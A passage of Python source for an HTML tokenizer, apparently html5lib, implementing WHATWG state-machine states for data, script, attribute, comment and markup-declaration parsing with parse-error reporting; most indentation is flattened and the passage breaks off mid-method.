self.tokenQueue.append({"type": tokenTypes[tokenType], "data": output})
def processEntityInAttribute(self, allowedChar):
"""This method replaces the need for "entityInAttributeValueState".
"""
self.consumeEntity(allowedChar=allowedChar, fromAttribute=True)
def emitCurrentToken(self):
"""This method is a generic handler for emitting the tags. It also sets
the state to "data" because that's what's needed after a token has been
emitted.
"""
token = self.currentToken
# Add token to the queue to be yielded
if (token["type"] in tagTokenTypes):
token["name"] = token["name"].translate(asciiUpper2Lower)
if token["type"] == tokenTypes["StartTag"]:
raw = token["data"]
data = attributeMap(raw)
if len(raw) > len(data):
                    # We had duplicated attributes: update with the reversed
                    # list so the first occurrence of each name wins.
data.update(raw[::-1])
token["data"] = data
if token["type"] == tokenTypes["EndTag"]:
if token["data"]:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "attributes-in-end-tag"})
if token["selfClosing"]:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "self-closing-flag-on-end-tag"})
self.tokenQueue.append(token)
self.state = self.dataState
# Below are the various tokenizer states worked out.
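    # Their names and transitions mirror the tokenizer states of the WHATWG
    # HTML specification (data state, tag open state, and so on), one method
    # per state.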
def dataState(self):
data = self.stream.char()
if data == "&":
self.state = self.entityDataState
elif data == "<":
self.state = self.tagOpenState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\u0000"})
elif data is EOF:
# Tokenization ends.
return False
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data":
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
chars = self.stream.charsUntil(("&", "<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def entityDataState(self):
self.consumeEntity()
self.state = self.dataState
return True
def rcdataState(self):
data = self.stream.char()
if data == "&":
self.state = self.characterReferenceInRcdata
elif data == "<":
self.state = self.rcdataLessThanSignState
elif data == EOF:
# Tokenization ends.
return False
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data":
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
chars = self.stream.charsUntil(("&", "<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def characterReferenceInRcdata(self):
self.consumeEntity()
self.state = self.rcdataState
return True
def rawtextState(self):
data = self.stream.char()
if data == "<":
self.state = self.rawtextLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
# Tokenization ends.
return False
else:
chars = self.stream.charsUntil(("<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def scriptDataState(self):
data = self.stream.char()
if data == "<":
self.state = self.scriptDataLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
# Tokenization ends.
return False
else:
chars = self.stream.charsUntil(("<", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def plaintextState(self):
data = self.stream.char()
if data == EOF:
# Tokenization ends.
return False
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + self.stream.charsUntil("\u0000")})
return True
def tagOpenState(self):
data = self.stream.char()
if data == "!":
self.state = self.markupDeclarationOpenState
elif data == "/":
self.state = self.closeTagOpenState
elif data in asciiLetters:
self.currentToken = {"type": tokenTypes["StartTag"],
"name": data, "data": [],
"selfClosing": False,
"selfClosingAcknowledged": False}
self.state = self.tagNameState
elif data == ">":
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name-but-got-right-bracket"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<>"})
self.state = self.dataState
elif data == "?":
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name-but-got-question-mark"})
self.stream.unget(data)
self.state = self.bogusCommentState
else:
# XXX
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.dataState
return True
def closeTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.currentToken = {"type": tokenTypes["EndTag"], "name": data,
"data": [], "selfClosing": False}
self.state = self.tagNameState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-right-bracket"})
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-eof"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.state = self.dataState
else:
# XXX data can be _'_...
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-char",
"datavars": {"data": data}})
self.stream.unget(data)
self.state = self.bogusCommentState
return True
def tagNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == ">":
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-tag-name"})
self.state = self.dataState
elif data == "/":
self.state = self.selfClosingStartTagState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["name"] += "\uFFFD"
else:
self.currentToken["name"] += data
# (Don't use charsUntil here, because tag names are
# very short and it's faster to not do anything fancy)
return True
def rcdataLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.rcdataEndTagOpenState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rcdataEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.rcdataEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rcdataEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rawtextLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.rawtextEndTagOpenState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.rawtextState
return True
def rawtextEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.rawtextEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.rawtextState
return True
def rawtextEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.rawtextState
return True
def scriptDataLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.scriptDataEndTagOpenState
elif data == "!":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<!"})
self.state = self.scriptDataEscapeStartState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.scriptDataEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapeStartState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapeStartDashState
else:
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapeStartDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapedDashDashState
else:
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapedState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapedDashState
elif data == "<":
self.state = self.scriptDataEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
self.state = self.dataState
else:
chars = self.stream.charsUntil(("<", "-", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def scriptDataEscapedDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapedDashDashState
elif data == "<":
self.state = self.scriptDataEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataEscapedState
elif data == EOF:
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedDashDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
elif data == "<":
self.state = self.scriptDataEscapedLessThanSignState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": ">"})
self.state = self.scriptDataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataEscapedState
elif data == EOF:
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.scriptDataEscapedEndTagOpenState
elif data in asciiLetters:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<" + data})
self.temporaryBuffer = data
self.state = self.scriptDataDoubleEscapeStartState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer = data
self.state = self.scriptDataEscapedEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataDoubleEscapeStartState(self):
data = self.stream.char()
if data in (spaceCharacters | frozenset(("/", ">"))):
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
if self.temporaryBuffer.lower() == "script":
self.state = self.scriptDataDoubleEscapedState
else:
self.state = self.scriptDataEscapedState
elif data in asciiLetters:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.temporaryBuffer += data
else:
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataDoubleEscapedState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataDoubleEscapedDashState
elif data == "<":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-script-in-script"})
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
return True
def scriptDataDoubleEscapedDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataDoubleEscapedDashDashState
elif data == "<":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataDoubleEscapedState
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-script-in-script"})
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapedDashDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
elif data == "<":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": ">"})
self.state = self.scriptDataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataDoubleEscapedState
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-script-in-script"})
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapedLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "/"})
self.temporaryBuffer = ""
self.state = self.scriptDataDoubleEscapeEndState
else:
self.stream.unget(data)
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapeEndState(self):
data = self.stream.char()
if data in (spaceCharacters | frozenset(("/", ">"))):
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
if self.temporaryBuffer.lower() == "script":
self.state = self.scriptDataEscapedState
else:
self.state = self.scriptDataDoubleEscapedState
elif data in asciiLetters:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.temporaryBuffer += data
else:
self.stream.unget(data)
self.state = self.scriptDataDoubleEscapedState
return True
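    # The "double escape" states above implement the spec's handling of a
    # nested "<script>" inside an escaped "<!--" section of script data: the
    # temporaryBuffer is compared against "script" to decide when to enter and
    # leave the double-escaped variants of the escaped states.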
def beforeAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data in asciiLetters:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data == ">":
self.emitCurrentToken()
elif data == "/":
self.state = self.selfClosingStartTagState
elif data in ("'", '"', "=", "<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"invalid-character-in-attribute-name"})
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"].append(["\uFFFD", ""])
self.state = self.attributeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-name-but-got-eof"})
self.state = self.dataState
else:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
return True
def attributeNameState(self):
data = self.stream.char()
leavingThisState = True
emitToken = False
if data == "=":
self.state = self.beforeAttributeValueState
elif data in asciiLetters:
self.currentToken["data"][-1][0] += data +\
self.stream.charsUntil(asciiLetters, True)
leavingThisState = False
elif data == ">":
# XXX If we emit here the attributes are converted to a dict
# without being checked and when the code below runs we error
# because data is a dict not a list
emitToken = True
elif data in spaceCharacters:
self.state = self.afterAttributeNameState
elif data == "/":
self.state = self.selfClosingStartTagState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][0] += "\uFFFD"
leavingThisState = False
elif data in ("'", '"', "<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"invalid-character-in-attribute-name"})
self.currentToken["data"][-1][0] += data
leavingThisState = False
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "eof-in-attribute-name"})
self.state = self.dataState
else:
self.currentToken["data"][-1][0] += data
leavingThisState = False
if leavingThisState:
# Attributes are not dropped at this stage. That happens when the
# start tag token is emitted so values can still be safely appended
# to attributes, but we do want to report the parse error in time.
self.currentToken["data"][-1][0] = (
self.currentToken["data"][-1][0].translate(asciiUpper2Lower))
for name, _ in self.currentToken["data"][:-1]:
if self.currentToken["data"][-1][0] == name:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"duplicate-attribute"})
break
# XXX Fix for above XXX
if emitToken:
self.emitCurrentToken()
return True
def afterAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == "=":
self.state = self.beforeAttributeValueState
elif data == ">":
self.emitCurrentToken()
elif data in asciiLetters:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data == "/":
self.state = self.selfClosingStartTagState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"].append(["\uFFFD", ""])
self.state = self.attributeNameState
elif data in ("'", '"', "<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"invalid-character-after-attribute-name"})
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-end-of-tag-but-got-eof"})
self.state = self.dataState
else:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
return True
def beforeAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == "\"":
self.state = self.attributeValueDoubleQuotedState
elif data == "&":
self.state = self.attributeValueUnQuotedState
self.stream.unget(data)
elif data == "'":
self.state = self.attributeValueSingleQuotedState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-value-but-got-right-bracket"})
self.emitCurrentToken()
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
self.state = self.attributeValueUnQuotedState
elif data in ("=", "<", "`"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"equals-in-unquoted-attribute-value"})
self.currentToken["data"][-1][1] += data
self.state = self.attributeValueUnQuotedState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-value-but-got-eof"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data
self.state = self.attributeValueUnQuotedState
return True
def attributeValueDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterAttributeValueState
elif data == "&":
self.processEntityInAttribute('"')
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-double-quote"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data +\
self.stream.charsUntil(("\"", "&", "\u0000"))
return True
def attributeValueSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterAttributeValueState
elif data == "&":
self.processEntityInAttribute("'")
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-single-quote"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data +\
self.stream.charsUntil(("'", "&", "\u0000"))
return True
def attributeValueUnQuotedState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == "&":
self.processEntityInAttribute(">")
elif data == ">":
self.emitCurrentToken()
elif data in ('"', "'", "=", "<", "`"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-in-unquoted-attribute-value"})
self.currentToken["data"][-1][1] += data
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-no-quotes"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data + self.stream.charsUntil(
frozenset(("&", ">", '"', "'", "=", "<", "`", "\u0000")) | spaceCharacters)
return True
def afterAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == ">":
self.emitCurrentToken()
elif data == "/":
self.state = self.selfClosingStartTagState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-EOF-after-attribute-value"})
self.stream.unget(data)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-after-attribute-value"})
self.stream.unget(data)
self.state = self.beforeAttributeNameState
return True
def selfClosingStartTagState(self):
data = self.stream.char()
if data == ">":
self.currentToken["selfClosing"] = True
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"unexpected-EOF-after-solidus-in-tag"})
self.stream.unget(data)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-after-solidus-in-tag"})
self.stream.unget(data)
self.state = self.beforeAttributeNameState
return True
def bogusCommentState(self):
# Make a new comment token and give it as value all the characters
# until the first > or EOF (charsUntil checks for EOF automatically)
# and emit it.
data = self.stream.charsUntil(">")
data = data.replace("\u0000", "\uFFFD")
self.tokenQueue.append(
{"type": tokenTypes["Comment"], "data": data})
# Eat the character directly after the bogus comment which is either a
# ">" or an EOF.
self.stream.char()
self.state = self.dataState
return True
def markupDeclarationOpenState(self):
charStack = [self.stream.char()]
if charStack[-1] == "-":
charStack.append(self.stream.char())
if charStack[-1] == "-":
self.currentToken = {"type": tokenTypes["Comment"], "data": ""}
self.state = self.commentStartState
return True
elif charStack[-1] in ('d', 'D'):
matched = True
for expected in (('o', 'O'), ('c', 'C'), ('t', 'T'),
('y', 'Y'), ('p', 'P'), ('e', 'E')):
charStack.append(self.stream.char())
if charStack[-1] not in expected:
matched = False
break
if matched:
self.currentToken = {"type": tokenTypes["Doctype"],
"name": "",
"publicId": None, "systemId": None,
"correct": True}
self.state = self.doctypeState
return True
elif (charStack[-1] == "[" and
self.parser is not None and
self.parser.tree.openElements and
self.parser.tree.openElements[-1].namespace != self.parser.tree.defaultNamespace):
matched = True
for expected in ["C", "D", "A", "T", "A", "["]:
charStack.append(self.stream.char())
if charStack[-1] != expected:
matched = False
break
if matched:
self.state = self.cdataSectionState
return True
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-dashes-or-doctype"})
while charStack:
self.stream.unget(charStack.pop())
self.state = self.bogusCommentState
return True
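    # markupDeclarationOpenState dispatches the "<!" constructs: "--" opens a
    # comment, a case-insensitive "DOCTYPE" opens a doctype, and "[CDATA[" is
    # honoured only when the current node is in a foreign (non-HTML)
    # namespace; anything else becomes a bogus comment after an
    # "expected-dashes-or-doctype" parse error.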
def commentStartState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentStartDashState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += data
self.state = self.commentState
return True
def commentStartDashState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentEndState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "-\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += "-" + data
self.state = self.commentState
return True
def commentState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentEndDashState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += data + \
self.stream.charsUntil(("-", "\u0000"))
return True
def commentEndDashState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentEndState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "-\uFFFD"
self.state = self.commentState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-end-dash"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
